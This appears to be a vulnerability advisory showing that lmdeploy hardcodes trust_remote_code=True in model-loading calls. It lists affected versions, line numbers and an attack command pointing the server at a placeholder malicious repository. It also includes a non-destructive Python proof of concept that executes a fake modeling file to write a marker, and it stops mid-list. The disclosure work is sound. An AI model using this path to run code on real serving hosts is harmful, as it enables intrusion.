lmdeploy hardcodes trust_remote_code=True in multiple HuggingFace model-loading call sites.
The affected code paths are in:
lmdeploy/archs.py
lmdeploy/utils.py
The vulnerable call sites pass trust_remote_code=True into HuggingFace Transformers APIs such as AutoConfig.from_pretrained(), PretrainedConfig.get_config_dict(), and GenerationConfig.from_pretrained().
Because the model path is supplied by the operator or deployment configuration, an attacker who can control the model_path used by an lmdeploy serving process can point it to an attacker-controlled HuggingFace model repository. When lmdeploy starts and initializes the model, Transformers may download and execute remote Python code from that repository.
Successful exploitation results in arbitrary code execution with the privileges of the lmdeploy serving process.
Confirmed affected:
lmdeploy <= 0.12.3
The issue was verified on v0.12.3 and on main.
Confirmed call sites:
lmdeploy/archs.py:154
AutoConfig.from_pretrained(..., trust_remote_code=True)
lmdeploy/archs.py:157
PretrainedConfig.get_config_dict(..., trust_remote_code=True)
lmdeploy/utils.py:225
GenerationConfig.from_pretrained(..., trust_remote_code=True)
The vulnerable pattern is:
AutoConfig.from_pretrained(model_path, trust_remote_code=True)
and:
GenerationConfig.from_pretrained(path, trust_remote_code=True)
The risk is that trust_remote_code=True is enabled unconditionally. Users are not required to explicitly opt in through a CLI flag or configuration option.
attacker-org/malicious-model
lmdeploy serve api_server attacker-org/malicious-model
trust_remote_code=True.trust_remote_code=True is a dangerous HuggingFace option because it allows model repositories to execute custom Python code during model loading.
In lmdeploy, this option is hardcoded at multiple call sites. This removes the explicit trust decision from the user or deployment operator. A safer design would require an explicit CLI flag or configuration option such as --trust-remote-code.
lmdeploy is commonly used as a model serving daemon. The serving process may have access to model weights, GPU resources, API credentials, cloud credentials, request data, and internal network resources.
The following PoC demonstrates the vulnerable primitive in a local, non-destructive way. It simulates lmdeploy calling a HuggingFace model-loading path with trust_remote_code=True and shows that remote model code would execute during initialization.
#!/usr/bin/env python3
from __future__ import annotations
import argparse
import importlib.util
import os
import sys
import tempfile
from pathlib import Path
MARKER = Path("/tmp/LMDEPLOY_TRUST_REMOTE_CODE_RCE_PROOF")
MALICIOUS_MODEL = "attacker-org/malicious-model"
def simulate_lmdeploy_model_load(model_path: str) -> None:
"""
Simulates lmdeploy model initialization where trust_remote_code=True is hardcoded.
Real vulnerable pattern:
AutoConfig.from_pretrained(model_path, trust_remote_code=True)
GenerationConfig.from_pretrained(path, trust_remote_code=True)
When trust_remote_code=True, a malicious HuggingFace model repository can
execute custom Python code during loading.
"""
fake_model_dir = Path(tempfile.mkdtemp(prefix="fake_lmdeploy_model_"))
module_name = model_path.split("/")[-1].replace("-", "_")
modeling_file = fake_model_dir / f"modeling_{module_name}.py"
payload = f'''
import os
from pathlib import Path
Path("{MARKER}").write_text(
"lmdeploy trust_remote_code execution confirmed\\n"
f"model_path={model_path!r}\\n"
f"pid={{os.getpid()}} euid={{os.geteuid()}}\\n"
)
'''
modeling_file.write_text(payload)
spec = importlib.util.spec_from_file_location(f"modeling_{module_name}", modeling_file)
assert spec is not None and spec.loader is not None
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
def main() -> int:
parser = argparse.ArgumentParser()
parser.add_argument("--model-id", default=MALICIOUS_MODEL)
args = parser.parse_args()
if MARKER.exists():
MARKER.unlink()
print(f"[*] Simulating lmdeploy loading model: {args.model_id}")
print("[*] trust_remote_code=True is hardcoded in lmdeploy model-loading paths")
simulate_lmdeploy_model_load(args.model_id)
if MARKER.exists():
print("[+] Code execution confirmed")
print(MARKER.read_text())
return 0
print("[-] Marker file was not created", file=sys.stderr)
return 1
if __name__ == "__main__":
raise SystemExit(main())
Expected result:
[+] Code execution confirmed
The marker file is written to:
/tmp/LMDEPLOY_TRUST_REMOTE_CODE_RCE_PROOF
An attacker who can control the model path used by an lmdeploy deployment can execute arbitrary Python code during model initialization.
The attacker may be able to: